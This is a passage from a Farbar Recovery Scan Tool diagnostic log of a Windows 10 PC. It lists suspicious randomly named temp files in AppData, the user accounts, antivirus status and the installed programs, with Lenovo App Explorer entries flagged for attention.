Hostetler\AppData\Roaming\swhi.Fm.tmp
2022-03-21 22:16 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\tgIysyi.tmp
2022-03-22 07:50 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\u.vBKhg.tmp
2022-03-22 05:50 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\uebnfhx.tmp
2022-03-23 00:14 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\uhhsnBd.tmp
2022-03-23 01:36 - 2022-03-23 01:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\vacfsmG.tmp
2022-03-21 20:37 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\vCkilCq.tmp
2022-03-22 05:30 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\vowws.H.tmp
2022-03-22 10:34 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\x.fkmhm.tmp
2022-03-22 14:12 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\xbfAl.r.tmp
2022-03-22 01:00 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\yc.Kam..tmp
2022-03-22 20:08 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\ymybaBG.tmp
2022-03-22 02:22 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\zatwfvJ.tmp
2022-03-22 05:06 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\zBllBya.tmp
2022-03-22 01:46 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\zIBKqww.tmp
2022-03-21 16:52 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\zkKIqmK.tmp
2022-03-22 18:20 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\zmabqBm.tmp
2019-03-04 14:51 - 2019-03-04 14:51 - 000000208 _____ () C:\Users\Karin
Hostetler\AppData\Local\oobelibMkey.log
2021-11-14 21:25 - 2021-11-14 21:25 - 000000839 _____ () C:\Users\Karin
Hostetler\AppData\Local\recently-used.xbel
2018-07-03 08:29 - 2018-07-03 08:29 - 000000017 _____ () C:\Users\Karin
Hostetler\AppData\Local\resmon.resmoncfg
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
==================== End of FRST.txt ========================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-03-2022
Ran by Karin Hostetler (23-03-2022 08:58:09)
Running from C:\Users\Karin Hostetler\Desktop\Delete
Microsoft Windows 10 Home Version 21H2 19044.1586 (X64) (2020-09-29 13:38:19)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
(If an entry is included in the fixlist, it will be removed.)
Administrator (S-1-5-21-1394640484-365018484-2708498470-500 - Administrator -
Disabled)
DefaultAccount (S-1-5-21-1394640484-365018484-2708498470-503 - Limited -
Disabled)
defaultuser0 (S-1-5-21-1394640484-365018484-2708498470-1000 - Limited -
Disabled)
Guest (S-1-5-21-1394640484-365018484-2708498470-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1394640484-365018484-2708498470-1005 - Limited -
Enabled)
Karin Hostetler (S-1-5-21-1394640484-365018484-2708498470-1001 - Administrator -
Enabled) => C:\Users\Karin Hostetler
QBDataServiceUser26 (S-1-5-21-1394640484-365018484-2708498470-1003 - Limited -
Enabled) => C:\Users\QBDataServiceUser26
QBDataServiceUser27 (S-1-5-21-1394640484-365018484-2708498470-1002 - Limited -
Enabled) => C:\Users\QBDataServiceUser27
QBDataServiceUser28 (S-1-5-21-1394640484-365018484-2708498470-1006 - Limited -
Enabled) => C:\Users\QBDataServiceUser28
QBDataServiceUser29 (S-1-5-21-1394640484-365018484-2708498470-1007 - Limited -
Enabled) => C:\Users\QBDataServiceUser29
QBDataServiceUser30 (S-1-5-21-1394640484-365018484-2708498470-1008 - Limited -
Enabled) => C:\Users\QBDataServiceUser30
QBDataServiceUser31 (S-1-5-21-1394640484-365018484-2708498470-1009 - Limited -
Enabled) => C:\Users\QBDataServiceUser31
QBDataServiceUser32 (S-1-5-21-1394640484-365018484-2708498470-1010 - Limited -
Enabled) => C:\Users\QBDataServiceUser32
WDAGUtilityAccount (S-1-5-21-1394640484-365018484-2708498470-504 - Limited -
Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date)
{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to
unhide them. The adware programs should be uninstalled manually.)
Adobe Acrobat DC (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-0C0F074E4100}) (Version:
22.001.20085 - Adobe Systems Incorporated)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100})
(Version: 22.001.20085 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 4.8.1.435 -
Adobe Systems Incorporated)
Adobe Genuine Service (HKLM-x32\...\AdobeGenuineService) (Version: 7.6.0.52 -
Adobe Inc.)
AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.6
- Advanced Micro Devices, Inc.)
ASAP Utilities (HKLM-x32\...\ASAP Utilities_is1) (Version: 7.9.3 - A Must in
Every Office BV - Bastien Mensink)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 -
Apple Inc.)
BRC IIF Transaction Creator Pro (HKLM-x32\...\IIF Transaction Creator Pro)
(Version: 11.47 - Big Red Consulting)
Brother MFL-Pro Suite MFC-9130CW
(HKLM-x32\...\{E98A9C92-E767-475B-8BC6-8780A86DDC72}) (Version: 1.0.1.0 -
Brother Industries, Ltd.)
Carbonite (HKLM-x32\...\{6F860AE9-A74E-4D1E-84A0-E2FA01476D77}) (Version: 6.3.8
build 8542 (Jan-21-2021) - Carbonite)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9})
(Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722})
(Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F})
(Version: 1.1.6 - Cisco Systems, Inc.)
Cisco Webex Meetings
(HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\ActiveTouchMeetingClient)
(Version: 40.8.5 - Cisco Webex LLC)
CyberLink PowerDVD 14 (HKLM-x32\...\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB})
(Version: 14.0.1.6714 - CyberLink Corp.)
Data Transfer Utility 11 (HKLM-x32\...\Data Transfer Utility 11) (Version: - )
Driver and Application Installation
(HKLM-x32\...\{6EC299C6-074C-4529-8D5F-2798584BB27B}) (Version: 2.12.0219 -
Lenovo)
DYMO Label v.8 (HKLM-x32\...\DYMO Label v.8) (Version: 8.5.4.1913 - Sanford,
L.P.)
ExpressVPN (HKLM-x32\...\{b8ff9d27-eab9-4320-ad9b-dba303194cc0}) (Version:
10.2.1.54 - ExpressVPN)
ExpressVPN (HKLM-x32\...\{E5B9C3E5-889C-4F22-A959-F4B876ED8867}) (Version:
10.2.1.54 - ExpressVPN) Hidden
GIMP 2.10.18 (HKLM\...\GIMP-2_is1) (Version: 2.10.18 - The GIMP Team)
GlanceGuest version 4.17.1.19
(HKLM-x32\...\{F5AC5408-CC29-47C0-AD53-1BBBF268B364}_is1) (Version: 4.17.1.19 -
Glance Networks, Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 99.0.4844.82 - Google LLC)
GoTo Opener (HKLM-x32\...\{E69269DB-A77B-4BC1-8F39-241107B09F26}) (Version:
1.0.539 - LogMeIn, Inc.)
GoToAssist Customer 4.8.0.1702 (HKLM-x32\...\GoToAssist Express Customer)
(Version: 4.8.0.1702 - LogMeIn, Inc.)
GoToAssist Expert 4.8.0.1702
(HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\GoToAssist Remote Support
Expert) (Version: 4.8.0.1702 - LogMeIn, Inc.)
Homestead SiteBuilder (HKLM-x32\...\Homestead SiteBuilder) (Version: -
Homestead)
HP LaserJet Professional P1100-P1560-P1600 Series (HKLM\...\HP LaserJet
Professional P1100-P1560-P1600 Series) (Version: - )
HPSSupply (HKLM-x32\...\{7902E313-FF0F-4493-ACB1-A8147B78DCD0}) (Version:
2.1.1.0000 - Hewlett Packard Development Company L.P.)
LastPass (uninstall only) (HKLM-x32\...\LastPass) (Version: - LastPass)
Lenovo App Explorer (HKU\S-1-5-19\...\Host App Service) (Version: 0.272.1.266 -
SweetLabs for Lenovo) <==== ATTENTION
Lenovo App Explorer (HKU\S-1-5-20\...\Host App Service) (Version: 0.272.1.266 -
SweetLabs for Lenovo) <==== ATTENTION
Lenovo App Explorer (HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\Host
App Service) (Version: 0.273.4.369 - SweetLabs for Lenovo) <==== ATTENTION
Lenovo App Explorer (HKU\S-1-5-21-1394640484-365018484-2708498470-1002\...\Host
App Service) (Version: 0.272.1.266 - SweetLabs for Lenovo) <==== ATTENTION
Lenovo App Explorer (HKU\S-1-5-21-1394640484-365018484-2708498470-1003\...\Host
App Service) (Version: 0.272.1.266 - SweetLabs for Lenovo) <==== ATTENTION
Lenovo App Explorer (HKU\S-1-5-21-1394640484-365018484-2708498470-1006\...\Host
App Service) (Version: 0.272.1.266 - SweetLabs for Lenovo) <==== ATTENTION
Lenovo App Explorer (HKU\S-1-5-21-1394640484-365018484-2708498470-1007\...\Host
App Service) (Version: 0.272.1.266 - SweetLabs for Lenovo) <==== ATTENTION
Lenovo App Explorer (HKU\S-1-5-21-1394640484-365018484-2708498470-1008\...\Host
App Service) (Version: 0.272.1.266 - SweetLabs for Lenovo) <==== ATTENTION
Lenovo App Explorer (HKU\S-1-5-21-1394640484-365018484-2708498470-1009\...\Host
App Service) (Version: 0.272.1.266 - SweetLabs for Lenovo) <==== ATTENTION
Lenovo App Explorer (HKU\S-1-5-21-1394640484-365018484-2708498470-1010\...\Host
App Service) (Version: 0.272.1.266 - SweetLabs for Lenovo) <==== ATTENTION
Lenovo Blacksilk USB Keyboard Driver
(HKLM-x32\...\{B266E062-D6C5-485B-B426-51B152B041A6}) (Version: V1.6.13.0724 -
Lenovo)
Lenovo Family Cloud Server (HKLM\...\{E3573BD4-2C6B-4436-921C-D15B9278A610})
(Version: 1.2.119.1129 - Lenovo) Hidden
Lenovo Family Cloud Server
(HKLM-x32\...\InstallShield_{E3573BD4-2C6B-4436-921C-D15B9278A610}) (Version:
1.2.119.1129 - Lenovo)
Lenovo Power2Go (HKLM-x32\...\{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version:
6.0.8231 - CyberLink Corp.) Hidden
Lenovo Power2Go
(HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version:
6.0.8231 - CyberLink Corp.)
Lenovo Service Bridge
(HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\{2C74547D-EF88-47F4-85F5-BE46A31E26B7}_is1)
(Version: 5.0.2.9 - Lenovo)
Lenovo Vantage Service (HKLM-x32\...\VantageSRV_is1) (Version: 3.1.76.0 - Lenovo
Group Ltd.)
LG Mobile Drivers (HKLM-x32\...\{E2C19FF2-BEDB-45B8-87A8-EBF6C0508E3B})
(Version: 4.4.2 - LG Electronics)
Logitech SetPoint 6.67 (HKLM\...\sp6) (Version: 6.67.83 - Logitech)
Manual (HKLM-x32\...\{693F92E5-37D1-46B7-A0D6-19A74A2FD0EC}) (Version: 1.00.0701
- Lenovo)
MB4Outlook (HKLM-x32\...\{72D3240A-7763-41C2-AF67-C6838598B256}_is1) (Version:
1.6 - Innovation Technology Inc.)
Microsoft Access database engine 2010 (English)
(HKLM\...\{90140000-00D1-0409-1000-0000000FF1CE}) (Version: 14.0.7015.1000 -
Microsoft Corporation)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 99.0.1150.46 - Microsoft
Corporation)
Microsoft Office 2007 Primary Interop Assemblies
(HKLM-x32\...\{50120000-1105-0000-0000-0000000FF1CE}) (Version: 12.0.4518.1014 -
Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3)
(HKLM-x32\...\{91120000-0014-0000-0000-0000000FF1CE}_PROR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93})
(Version: - Microsoft)
Microsoft Office File Validation Add-In
(HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 -
Microsoft Corporation)
Microsoft Office Professional 2007 (HKLM-x32\...\PROR) (Version: 12.0.6612.1000
- Microsoft Corporation)
Microsoft OneDrive
(HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\OneDriveSetup.exe)
(Version: 22.033.0213.0002 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00})
(Version: 5.1.50918.0 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{5016990D-7F61-4A20-9451-A915D6616DD9})
(Version: 3.66.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable
(HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 -
Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable
(HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 -
Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable
(HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 -
Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64)
(HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 -
Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64)
(HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 -
Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64)
(HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 -
Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
(HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 -
Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
(HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 -
Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
(HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 -
Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
(HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 -
Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
(HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 -
Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219
(HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 -
Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219
(HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 -
Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727
(HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 -
Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030
(HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 -
Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727
(HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 -
Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030
(HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 -
Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501
(HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 -
Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660
(HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 -
Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501
(HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 -
Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660
(HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 -
Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.29.30133
(HKLM-x32\...\{295d1583-fdb9-414b-a4c8-da539362a26b}) (Version: 14.29.30133.0 -
Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.29.30133
(HKLM-x32\...\{38b2c744-ad08-4d5b-91a2-3fb6f739ff3e}) (Version: 14.29.30133.0 -
Microsoft Corporation)
Microsoft Visual J# 2.0 Redistributable Package (HKLM-x32\...\Microsoft Visual
J# 2.0 Redistributable Package) (Version: - Microsoft Corporation)
Microsoft Visual Studio 2005 Tools for Office Runtime (HKLM-x32\...\Microsoft
Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft
Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.31007 -
Microsoft Corporation)
MobiKin Assistant for Android
(HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\MobiKin Assistant for
Android) (Version: 3.12.16 - MobiKin)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94})
(Version: 4.30.2100.0 - Microsoft Corporation)
Nuance PaperPort 12 (HKLM-x32\...\{88B5FBDC-967D-4B1F-B291-39284AE12201})
(Version: 12.1.0005 - Nuance Communications, Inc.)
Nuance PDF Viewer Plus (HKLM-x32\...\{28656860-4728-433C-8AD4-D1A930437BC8})
(Version: 5.30.3290 - Nuance Communications, Inc)
Nuance Power PDF Standard (HKLM\...\{A71E5DA3-8DBF-4033-90A1-26536CEE4805})
(Version: 2.10.6413 - Nuance Communications, Inc.)
ODIR (HKLM-x32\...\ODIR_is1) (Version: - Vaita)
PaperPort Image Printer 64-bit (HKLM\...\{715CAACC-579B-4831-A5F4-A83A8DE3EFE2})
(Version: 14.00.0000 - Nuance Communications, Inc.)
PhotoScape (HKLM-x32\...\PhotoScape) (Version: - )
QBSetup (HKLM-x32\...\{177D00EF-F325-43CB-9036-023A70EEAB61}) (Version: 1.0.0 -
Default Company Name)
QuickBooks (HKLM\...\{B9BE758E-50B5-4BA7-987B-63184123AA1A}) (Version:
32.0.4001.3201 - Intuit Inc.) Hidden
QuickBooks (HKLM-x32\...\{06A9E630-DBA6-4D92-9DE7-A235AA6496C7}) (Version:
20.0.4017.807 - Intuit Inc.) Hidden
QuickBooks (HKLM-x32\...\{1F355451-E2A7-470D-953B-F3E9BBCFFFFC}) (Version:
29.0.4011.2901 - Intuit Inc.) Hidden
QuickBooks (HKLM-x32\...\{25E202D1-D8E7-46AF-B4B0-157D9993A93E}) (Version:
22.0.4016.2206 - Intuit Inc.) Hidden
QuickBooks (HKLM-x32\...\{2B0E1E07-2F3D-4E7D-AD0A-1C74A8881B9B}) (Version:
26.0.4013.2607 - Intuit Inc.) Hidden
QuickBooks (HKLM-x32\...\{3167CC62-C775-4E47-92C1-73EBB845751A}) (Version:
23.0.4018.2305 - Intuit Inc.) Hidden
QuickBooks (HKLM-x32\...\{3B32E8ED-D3EA-4967-BE1B-35233AA2FDC0}) (Version:
27.0.4009.2702 - Intuit Inc.) Hidden
QuickBooks (HKLM-x32\...\{4120AF20-BA58-49D1-8CFA-11F166E73945}) (Version:
29.0.4016.2901 - Intuit Inc.) Hidden
QuickBooks (HKLM-x32\...\{422206F8-67E6-45AA-8C2A-C0010789E1F9}) (Version:
28.0.4014.2806 - Intuit Inc.) Hidden
QuickBooks (HKLM-x32\...\{48011BF6-E0BC-4B49-9DCA-C7144EF0C01E}) (Version:
28.0.4016.2806 - Intuit Inc.) Hidden
QuickBooks (HKLM-x32\...\{4D29DF3C-1A3F-42F7-A565-136F3E5EBD59}) (Version:
31.0.4008.3103 - Intuit Inc.) Hidden
QuickBooks (HKLM-x32\...\{604FB1E3-84F2-45E2-AD26-49422B021393}) (Version:
25.0.4014.2506 - Intuit Inc.) Hidden
QuickBooks (HKLM-x32\...\{88C0857B-7734-4EA5-A7D9-636DF8622B63}) (Version:
30.0.4013.3000 - Intuit Inc.) Hidden
QuickBooks (HKLM-x32\...\{8FAA979A-67A1-4B58-8AA2-A93A13C7FBE2}) (Version:
31.0.4008.3103 - Intuit Inc.) Hidden
QuickBooks (HKLM-x32\...\{B52E01F1-D34E-4381-B590-28DFF3C0B647}) (Version:
27.0.4015.2702 - Intuit Inc.) Hidden
QuickBooks (HKLM-x32\...\{DF699288-CD8C-49B9-9B26-E75A1896387B}) (Version:
30.0.4013.3000 - Intuit Inc.) Hidden
QuickBooks Desktop File Doctor
(HKLM-x32\...\{07441683-C1C3-43BC-B3E7-F213B3A69B76}) (Version: 4.6.0.0 - Intuit
Inc.)
QuickBooks Enterprise Server 22.0
(HKLM\...\{F3EC420A-258F-402C-96AB-F46F199E67D6}) (Version: 32.0.4001.3201 -
Intuit Inc.)
QuickBooks Enterprise Solutions: Accountant Edition 17.0
(HKLM-x32\...\{F77C660F-612B-4F76-BE68-91D2831BDB77}) (Version: 27.0.4009.2702 -
Intuit Inc.)
QuickBooks Enterprise Solutions: Accountant Edition 18.0
(HKLM-x32\...\{3EA4FAAD-9EC8-4995-87AA-D1B5C121EF08}) (Version: 28.0.4014.2806 -
Intuit Inc.)
QuickBooks Enterprise Solutions: Accountant Edition 19.0
(HKLM-x32\...\{A2B33094-0D22-4C72-B587-D0623D338090}) (Version: 29.0.4011.2901 -
Intuit Inc.)
QuickBooks Enterprise Solutions: Accountant Edition 20.0
(HKLM-x32\...\{26A90241-3077-43DA-9EF4-ABC27710E3C1}) (Version: 30.0.4013.3000 -
Intuit Inc.)
QuickBooks Enterprise Solutions: Accountant Edition 21.0
(HKLM-x32\...\{02ACBD62-6F07-491C-9C52-AED922199559}) (Version: 31.0.4008.3103 -
Intuit Inc.)
QuickBooks Premier: Accountant Edition 2010
(HKLM-x32\...\{0700E22B-A423-40A5-BD20-04BF618CA0F9}) (Version: 20.0.4017.807 -
Intuit Inc.)
QuickBooks Premier: Accountant Edition 2012
(HKLM-x32\...\{2181214D-1954-4C60-91FD-EEA7EBB32022}) (Version: 22.0.4016.2206 -
Intuit Inc.)
QuickBooks Premier: Accountant Edition 2013
(HKLM-x32\...\{36B3E6E3-D4DE-4B89-A9E6-727715C2A318}) (Version: 23.0.4018.2305 -
Intuit Inc.)
QuickBooks Premier: Accountant Edition 2015
(HKLM-x32\...\{D58E14D8-963A-4CCD-852E-065655D45004}) (Version: 25.0.4014.2506 -
Intuit Inc.)
QuickBooks Premier: Accountant Edition 2016
(HKLM-x32\...\{B266F416-6689-47B2-8FEB-98D47E2222BD}) (Version: 26.0.4013.2607 -
Intuit Inc.)
QuickBooks Premier: Accountant Edition 2017
(HKLM-x32\...\{A68AADD0-24C5-4F55-A955-C1288743B056}) (Version: 27.0.4015.2702 -
Intuit Inc.)
QuickBooks Premier: Accountant Edition 2018
(HKLM-x32\...\{4EDCB90E-ADBF-4101-A868-24410DD11481}) (Version: 28.0.4016.2806 -
Intuit Inc.)
QuickBooks Premier: Accountant Edition 2019
(HKLM-x32\...\{47DB717C-260F-4281-95E2-56B8336EB59B}) (Version: 29.0.4016.2901 -
Intuit Inc.)
QuickBooks Premier: Accountant Edition 2020
(HKLM-x32\...\{5DFD3C5F-49CB-4070-902B-550D15AE304B}) (Version: 30.0.4013.3000 -
Intuit Inc.)
QuickBooks Premier: Accountant Edition 2021
(HKLM-x32\...\{8E7E43F8-6861-43F2-AF47-2A975F4F1EA5}) (Version: 31.0.4008.3103 -
Intuit Inc.)
QuickBooks Runtime Redistributable
(HKLM\...\{F2A4F809-2DE6-4D27-888B-4D2BB8DAF20E}) (Version: 1.00.0000 - Intuit
Inc.)
QuickBooks Statement Writer (x64)
(HKLM\...\{99B78AE3-9616-470E-B93D-16117A2AFCAE}) (Version: 4.00.0000 - Intuit
Inc.)
QuickBooks Tool Hub (HKLM-x32\...\{5A43047E-1ACD-4F89-99E6-69988300E6AB})
(Version: 1.0.0.0 - Intuit Inc.)
REALTEK Bluetooth Filter Driver
(HKLM-x32\...\{9D3D8C60-A5EF-4123-B2B9-172095903AD}) (Version: 1.3.887.041216 -
REALTEK Semiconductor Corp.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A})
(Version: 6.3.9600.31213 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller All-In-One Windows Driver
(HKLM-x32\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 10.1.505.2015 -
Realtek)
REALTEK Wireless LAN Driver (HKLM-x32\...\{9DAABC60-A5EF-41FF-B2B9-17329590CD5})
(Version: 1.00.0286 - REALTEK Semiconductor Corp.)
RootsMagic 8.0.0.0 (HKLM-x32\...\{A28324FE-31F8-44BC-83D7-0108E80B6FFB}_is1)
(Version: RootsMagic 8.0.0.0 - RootsMagic, Inc.)
Update for 2007 Microsoft Office System (KB967642)
(HKLM-x32\...\{91120000-0014-0000-0000-0000000FF1CE}_PROR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D})
(Version: - Microsoft)
Update for Windows 10 for x64-based Systems (KB4023057)
(HKLM\...\{32DC821E-4A7D-4878-BEE8-337FA153D7F2}) (Version: 2.63.0.0 - Microsoft
Corporation) Hidden
VC12X64Redist (HKLM\...\{B573CC21-AE24-4BC5-9B0B-15CF29A3F982}) (Version:
1.00.0000 - Intuit Inc.)
VC12X86Redist (HKLM-x32\...\{EA9886ED-21F8-4867-A049-CE6817291EE6}) (Version:
1.00.0000 - Intuit Inc.)
Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual
Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft
Corporation)
Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258)
(HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 -
Microsoft Corporation)
Vulkan Run Time Libraries 1.0.21.0 (HKLM\...\VulkanRT1.0.21.0) (Version:
1.0.21.0 - LunarG, Inc.) Hidden
Vulkan Run Time Libraries 1.0.21.0 (HKLM\...\VulkanRT1.0.21.0-2) (Version:
1.0.21.0 - LunarG, Inc.)
WD Drive Utilities (HKLM-x32\...\{2db219ff-e483-403b-9374-aea609abaf1d})
(Version: 1.4.3.13 - Western Digital Technologies, Inc.) Hidden
Windows PC Health Check (HKLM\...\{B1E7D0FD-7CFE-4E0C-A5DA-0F676499DB91})
(Version: 3.2.2110.14001 - Microsoft Corporation)
Zoom (HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\ZoomUMX) (Version:
4.1 - Zoom Video Communications, Inc.)
Packages:
=========
Acrobat Notification Client -> C:\Program
Files\WindowsApps\AcrobatNotificationClient_1.0.4.0_x86__e1rzdqpraam7r
[2019-03-04] (Adobe Systems Incorporated)
HP Smart -> C:\Program
Files\WindowsApps\AD2F1837.HPPrinterControl_134.1.221.0_x64__v10z8vjag6ke6
[2022-01-27] (HP Inc.)
Lenovo Account Portal -> C:\Program
Files\WindowsApps\LenovoCorporation.LenovoID_2.0.37.0_x86__4642shxvsv8s2
[2017-05-08] (LENOVO INCORPORATED.)
Lenovo Vantage -> C:\Program
Files\WindowsApps\E046963F.LenovoCompanion_10.2202.9.0_x64__k1h2ywk1493x8
[2022-02-24] (LENOVO INC.)
Microsoft Advertising SDK for XAML -> C:\Program
Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe
[2019-01-13] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program
Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe
[2019-01-13] (Microsoft Corporation) [MS Ad]
Photos Media Engine Add-on -> C:\Program
Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe
[2021-02-03] (Microsoft Corporation)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry.
